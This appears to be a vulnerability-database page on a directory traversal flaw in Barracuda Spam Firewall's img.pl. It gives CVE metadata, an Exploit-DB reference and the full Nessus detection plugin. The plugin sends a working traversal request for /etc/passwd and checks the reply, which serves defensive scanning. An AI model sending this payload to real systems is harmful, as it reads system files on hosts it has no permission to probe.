Vulnerabilities > CVE-2005-2848 - Unspecified vulnerability in Barracuda Networks Barracuda Spam Firewall 3.1.16/3.1.17

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
barracuda-networks
nessus
exploit available

Summary

Directory traversal vulnerability in img.pl in Barracuda Spam Firewall running firmware 3.1.16 and 3.1.17 allows remote attackers to read arbitrary files via a .. (dot dot) in the f parameter.

Exploit-Db

descriptionBarracuda Spam Firewall < 3.1.18 Command Execution Exploit (meta). CVE-2005-2847,CVE-2005-2848. Webapps exploit for cgi platform
idEDB-ID:1236
last seen2016-01-31
modified2005-09-27
published2005-09-27
reporterNicolas Gregoire
sourcehttps://www.exploit-db.com/download/1236/
titleBarracuda Spam Firewall < 3.1.18 Command Execution Exploit meta

Nessus

NASL familyCGI abuses
NASL idBARRACUDA_SPAM_FIREWALL_3118.NASL
descriptionThe remote host appears to be a Barracuda Spam Firewall network appliance, which protects mail servers from spam, viruses, and the like. Further, it appears that the installed appliance suffers from several vulnerabilities that allow for execution of arbitrary code and reading of arbitrary files, all subject to the permissions of the web server user id.
last seen2020-06-01
modified2020-06-02
plugin id19556
published2005-09-01
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/19556
titleBarracuda Spam Firewall < 3.1.18 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description) {
  script_id(19556);
  script_version("1.20");
  script_cvs_date("Date: 2018/06/13 18:56:26");

  script_cve_id("CVE-2005-2847", "CVE-2005-2848");
  script_bugtraq_id(14710, 14712);
  script_xref(name:"EDB-ID", value:"1236");

  script_name(english:"Barracuda Spam Firewall < 3.1.18 Multiple Vulnerabilities");
  script_summary(english:"Attempts to access a local file via directory traversal");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be a Barracuda Spam Firewall network
appliance, which protects mail servers from spam, viruses, and the
like.

Further, it appears that the installed appliance suffers from several
vulnerabilities that allow for execution of arbitrary code and reading
of arbitrary files, all subject to the permissions of the web server
user id.");
 # http://web.archive.org/web/20051026050318/http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e58e748c");
  script_set_attribute(attribute:"solution", value:
"Upgrade to firmware 3.1.18 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Barracuda IMG.PL Remote Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2005/09/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/09/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:barracuda_networks:barracuda_spam_firewall");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_dependencies("barracuda_detect.nasl");
  script_require_ports("Services/www", 8000);
  script_require_keys("www/barracuda_spamfw");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:8000, embedded:TRUE);
get_kb_item_or_exit("www/barracuda_spamfw");

# Try to exploit one of the flaws to read /etc/passwd.
r = http_send_recv3(
  method : "GET",
  port   : port,
  item   : "/cgi-bin/img.pl?" + "f=../etc/passwd",
  exit_on_fail : TRUE
);
res = r[2];

# There's a problem if there's an entry for root.
if (egrep(string:res, pattern:"root:.*:0:[01]:"))
  security_hole(port);
else audit(AUDIT_LISTEN_NOT_VULN, "Barracuda Spam Firewall" , port);